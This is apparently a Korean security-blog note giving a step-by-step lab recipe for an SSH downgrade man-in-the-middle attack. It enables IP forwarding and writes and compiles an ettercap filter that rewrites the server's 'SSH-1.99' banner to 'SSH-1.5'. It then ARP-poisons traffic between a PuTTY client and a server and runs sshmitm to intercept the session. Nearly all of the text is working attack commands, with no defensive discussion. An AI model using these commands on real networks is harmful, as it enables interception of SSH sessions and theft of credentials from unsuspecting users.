본문 바로가기

security/해킹 보안

SSH Downgrade Attack - Note

================================================

A client  (putty가 있는 xp)

Putty.exe 실행 --> SSH를 이용 192.168.30.192(server 접속)

=================================================

공격자 셋팅

1. 첫번째 터미널

 #echo "1" > /proc/sys/net/ipv4/ip_forward

 #cat /proc/sys/net/ipv4/ip_forward  (반드시 1로 셋팅되어야 한다.)


2. 두번째 터미널

 #cat > sshdown.ecf

 if ( search(DATA.data, "SSH-1.99") )

 {

  replace("SSH-1.99","SSH-1.5");

 }

 (ctrl + d 를 동시에 눌러 저장)


 #etterfilter -o sshdown.ef sshdown.ecf


 #ettercap -T -M arp -F sshdown.ef /192.168.30.30/ /192.168.30.192/


3. 세번째 터미널

 #sshmitm -d -I -p 22 192.168.30.192

=================================================